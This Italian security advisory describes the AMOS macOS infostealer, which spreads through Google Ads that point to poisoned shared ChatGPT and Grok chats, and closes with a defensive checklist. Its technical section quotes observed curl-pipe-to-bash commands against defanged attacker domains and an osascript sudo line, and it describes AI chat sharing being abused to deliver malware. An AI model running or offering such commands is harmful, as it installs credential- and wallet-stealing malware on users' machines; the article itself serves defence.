Attenzione, utenti macOS: non eseguire mai comandi Terminal copiati da guide online! Gli hacker stanno sfruttando piattaforme fidate come ChatGPT e Grok per diffondere un malware chiamato AMOS (Atomic macOS Stealer), combinando inganno sociale e pubblicità mirate su Google Ads. Questa trappola sembra una normale soluzione a problemi comuni, come liberare spazio su disco, ma porta all’infezione del tuo Mac con un ladro di dati che ruba password, cookie, credenziali crypto e altro. Soluzione immediata: verifica sempre le fonti, usa un antivirus aggiornato e evita di incollare comandi sconosciuti nel Terminale.
I cybercriminali creano conversazioni condivisibili su questi strumenti di intelligenza artificiale, presentandole come istruzioni innocue per risolvere issues quotidiani. Queste chat appaiono nei risultati di ricerca grazie ad annunci sponsorizzati, mimetizzandosi tra consigli legittimi. L’utente, fidandosi del dominio AI, copia il comando fornito – spesso un pattern come “curl | bash” – che scarica ed esegue uno script malevolo. In pochi istanti, AMOS si installa silenziosamente, raccogliendo dati sensibili dai browser (Chrome, Safari, Firefox), dal Keychain di sistema e dai portafogli di criptovalute come Ledger, Trezor, Exodus, Electrum e Coinomi.
Questo approccio è subdolo perché sfrutta la credibilità delle piattaforme AI e delle pubblicità Google, rendendo l’attacco indistinguibile da un aiuto genuino. Gli stealer per macOS sono un business in espansione nel dark web: venduti su canali come Telegram a prezzi che sono passati da 1.000 a 3.000 dollari mensili, con modelli di revenue share (50/50 sui furti crypto) che incentivano affiliati a distribuirli. AMOS non si limita al furto: include backdoor per controllo remoto, keylogger, download di payload aggiuntivi e sorveglianza persistente anche dopo i riavvii.
Come funziona la trappola Google Ads-AI
Tutto inizia con una ricerca innocua, tipo “come pulire disco macOS”. Nei risultati emergono annunci che portano a chat AI avvelenate. La conversazione guida passo-passo: “Apri Terminale e incolla questo comando”. Lo script decodificato (spesso in base64) richiede la password di sistema, la convalida e scarica AMOS da domini come atlas-extension[.]com. Una volta dentro, il malware:
- Enumera hardware (modello Mac, UUID, CPU, RAM, versione OS).
- Chiede permessi per Desktop, Documenti e Download.
- Estrae cookie, password, dati autofill dai browser.
- Svota estensioni crypto (oltre 100 su Chrome) e seed phrase come MetaMask.
- Cerca file TXT, PDF, DOCX e Notes.
- Invia tutto a server controllati dagli attaccanti, più una backdoor per accessi futuri.
Parallelamente, AMOS evolve: usa dropper Python offuscati, GitHub per binari, DMG grandi con decoy e controlli ambientali per eludere rilevatori. Campioni firmati (es. Team ID GNJLS3UYZ4) passano Gatekeeper, arrivando come app notarizzate Swift.
Checklist per difenderti
- Non copiare comandi da web strani nel Terminale, specie se scaricano script.
- Controlla app che chiedono password non coerenti con l’attività.
- Monitora connessioni outbound insolite verso blockchain da app non finanziarie.
- Usa antivirus come quelli di Kaspersky o Malwarebytes per scansioni regolari.
- Aggiorna macOS e abilita XProtect e Gatekeeper.
- Per crypto: hardware wallet e 2FA.
Questi attacchi mostrano come le minacce macOS puntino su superfici fidate: ads, AI, notarizzazione. Anche con quota mercato bassa, i Mac sono appetibili per dati premium.
Approfondimento tecnico
AMOS è un infostealer sofisticato, classificato come trojan per Mac, attivo dal 2023 ma con picchi nel 2025. Venduto su Telegram, targetta 103+ estensioni Chrome crypto. La catena di infezione:
- Lure: Query search → Google Ads → ChatGPT/Grok condivisa.
- Payload delivery: Comando
curl https://malicious[.]com/script | bashdecodifica base64, richiede sudo. - Persistence: Backdoor in LaunchAgents, avvio auto post-reboot.
- Exfiltration: Dati a C2 via HTTP/HTTPS, con offuscamento.
Esempi comandi osservati:
curl -s https://atlas-extension[.]com/script.sh | bash
Lo script valida password, drop AMOS in ~/Library/, configura persistence:
osascript -e 'tell application "Terminal" to do script "sudo ..."'
Capacità evolute:
- Keylogging: Cattura input sensibili.
- Env checks: Verifica VM/sandbox per evasion.
- File grab: Regex per wallet.dat, seed.txt.
- Anti-analysis: DMG con decoy (es. tool legittimi), Mach-O signed.
Futuro: Versioni iOS possibili con DMA UE, marketplace alternativi. Hunt signals: Network to BNB Smart Chain, EtherHiding-like. Per rimozione: Boot in Recovery, erase volume, reinstall macOS; o tool come Combo Cleaner.
Resta vigile: macOS non è immune, adotta layered security.
